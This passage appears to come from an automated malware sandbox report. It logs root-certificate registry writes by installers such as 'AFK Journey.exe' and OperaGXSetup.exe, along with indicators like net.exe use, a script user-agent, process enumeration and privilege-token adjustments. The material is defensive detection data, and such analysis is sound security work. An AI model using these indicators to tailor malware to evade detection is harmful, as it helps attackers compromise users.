070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 rsEngineSvc.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 AFK Journey.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e AFK Journey.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 saBSI.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf5030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa21d0000000100000010000000e78921f81cea4d4105d2b5f4afae0c78140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2090000000100000016000000301406082b0601050507030306082b060105050703086200000001000000200000005367f20c7ade0e2bca790915056d086b720c33c1fa2a2661acf787e3292e12700b00000001000000800000004d006900630072006f0073006f006600740020004900640065006e007400690074007900200056006500720069006600690063006100740069006f006e00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003200300000000f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e2000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 rsEngineSvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e OperaGXSetup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1\Blob = 5c000000010000000400000000100000190000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd0300000001000000140000008094640eb5a7a1ca119c1fddd59f810263a7fbd17e00000001000000080000000080c82b6886d7017a000000010000000c000000300a06082b060105050703091d0000000100000010000000521f5c98970d19a8e515ef6eeb6d48ef140000000100000014000000ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a07f0000000100000016000000301406082b0601050507030306082b060105050703096200000001000000200000002cabeafe37d06ca22aba7391c0033d25982952c453647349763a3ab5ad6ccf690b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520036000000090000000100000056000000305406082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007e000000307c301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301f06092b06010401a032010230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000030000000ea09c51d4c3a334ce4acd2bc08c6a9be352e334f45c4fccfcab63edb9f82dc87d4bd2ed2fadae11163fb954809984ff10400000001000000100000004fdd07e4d42264391e0c3742ead1c6ae200000000100000087050000308205833082036ba003020102020e45e6bb038333c3856548e6ff4551300d06092a864886f70d01010c0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3134313231303030303030305a170d3334313231303030303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820222300d06092a864886f70d01010105000382020f003082020a02820201009507e873ca66f9ec14ca7b3cf70d08f1b4450b2c82b448c6eb5b3cae83b841923314a46f7fe92accc6b0886bc5b689d1c6b2ff14ce511421ec4add1b5ac6d687ee4d3a1506ed64660b9280ca44de73944ef3a7897f4f786308c812506d42662f4db979284d521a8a1a80b719810e7ec48abc644c211c4368d73d3c8ac5b266d5909ab73106c5bee26d3206a61ef9b9ebaaa3b8bfbe826350d0f01889dfe40f79f5eaa21f2ad2702e7be7bc93bb6d53e2487c8c100738ff66b277617ee0ea8c3caab4a4f6f3954a12076dfd8cb289cfd0a06177c85874b0d4233af75d3acaa2db9d09de5d442d90f181cd5792fa7ebc50046334df6b9318be6b36b239e4ac2436b7f0efb61c135793b6deb2f8e285b773a2b835aa45f2e09d36a16f548af172566e2e88c55142441594eea3c538969b4e4e5a0b47f30636497730bc7137e5a6ec210875fce661163f77d5d99197840a6cd4024d74c014edfd39fb83f25e14a104b00be9feee8fe16e0bb208b36166096ab1063a659659c0f035fdc9da288d1a118770810aa89a751d9e3a8605009edb80d625f9dc059e27594c76395beaf9a5a1d8830fd1ffdf3011f985cf3348f5ca6d64142c7a584fd34b0849c595641a630e793df5b38cca58ad9c4245796e0e87195c54b165b6bf8c9bdc13e90d6fb82edc676ec98b11b584148a0019708379919791d41a27bf371e3207d814633c284caf0203010001a3633061300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0300d06092a864886f70d01010c050003820201008325ede8d1fd9552cd9ec004a09169e65cd084dedcada24fe84778d66598a95ba83c877c028ad16eb71673e65fc05498d574bec1cde21191ad23183ddde1724496b4955ec07b8e99781643135657b3a2b33bb577dc4072aca3eb9b353eb10821a1e7c443377932beb5e79c2c4cbc4329998e30d3ac21e0e31dfad80733765400222ab94d202e7068dae553fc835cd39df2ff440c4466f2d2e3bd46001a6d02ba255d8da13151dd54461c4ddb9996ef1a1c045ca615ef78e079fe5ddb3eaa4c55fd9a15a96fe1a6fbdf7030e9c3ee4246edc2930589fa7d637b3fd071817c00e898ae0e7834c325fbaf0a9f206bdd3b138f128ce2411a487a73a07769c7b65c7f82c81efe581b282ba86cad5e6dc005d27bb7eb80fe2537fe029b68ac425dc3eef5ccdcf05075d236699ce67b04df6e0669b6de0a09485987eb7b14607a64aa6943ef91c74cec18dd6cef532d8c99e15ef2723ecf54c8bd67eca40f4c45ffd3b93023074c8f10bf8696d9995ab499571ca4ccbb158953ba2c050fe4c49e19b11834d54c9dbaedf71faf24950478a803bbee81e5da5f7c8b4aa1907425a7b33e4bc82c56bdc7c8ef38e25c92f079f79c84ba742d6101207e7ed1f24f07595f8b2d4352eb460c94e1f566477977d5545b1fad2437cb455a4ea04448c8d8b099c5158409f6d64949c065b8e61a716ea0a8f182e8453e6cd602d70a6783055ac9a410 AFK Journey.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 rsEngineSvc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f AFK Journey.exe -
Runs net.exe
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3972 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid Process 11116 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exeRegAsm.exeRegAsm.exeRegAsm.exeopera.exeopera_crashreporter.exeopera.exesvcshost.exepowershell.exeopera.exepid Process 748 chrome.exe 748 chrome.exe 6104 chrome.exe 6104 chrome.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5856 RegAsm.exe 5128 RegAsm.exe 1012 RegAsm.exe 1324 opera.exe 1324 opera.exe 2164 opera_crashreporter.exe 2164 opera_crashreporter.exe 2164 opera_crashreporter.exe 2164 opera_crashreporter.exe 5888 opera.exe 5888 opera.exe 5476 svcshost.exe 5476 svcshost.exe 7896 powershell.exe 7896 powershell.exe 7896 powershell.exe 7896 powershell.exe 5476 svcshost.exe 5476 svcshost.exe 5476 svcshost.exe 5476 svcshost.exe 5508 opera.exe 5508 opera.exe 5508 opera.exe 5508 opera.exe -
Suspicious behavior: GetForegroundWindowSpam 7 IoCs
Processes:
7zFM.exe7zG.exepowershell.exeopera.exe7zFM.exe7zFM.exetaskmgr.exepid Process 3988 7zFM.exe 5324 7zG.exe 5880 powershell.exe 5888 opera.exe 11688 7zFM.exe 11800 7zFM.exe 11300 taskmgr.exe -
Suspicious behavior: LoadsDriver 3 IoCs
Processes:
fltmc.exepid Process 392 fltmc.exe 624 624 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
Processes:
chrome.exeAVGBrowser.exeAVGBrowser.exeAVGBrowser.exeAVGBrowser.exepid Process 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 748 chrome.exe 4752 AVGBrowser.exe 4752 AVGBrowser.exe 4752 AVGBrowser.exe 5212 AVGBrowser.exe 11348 AVGBrowser.exe 11348 AVGBrowser.exe 11348 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe 13056 AVGBrowser.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
chrome.exedescription pid Process Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe Token: SeShutdownPrivilege 748 chrome.exe Token: SeCreatePagefilePrivilege 748 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
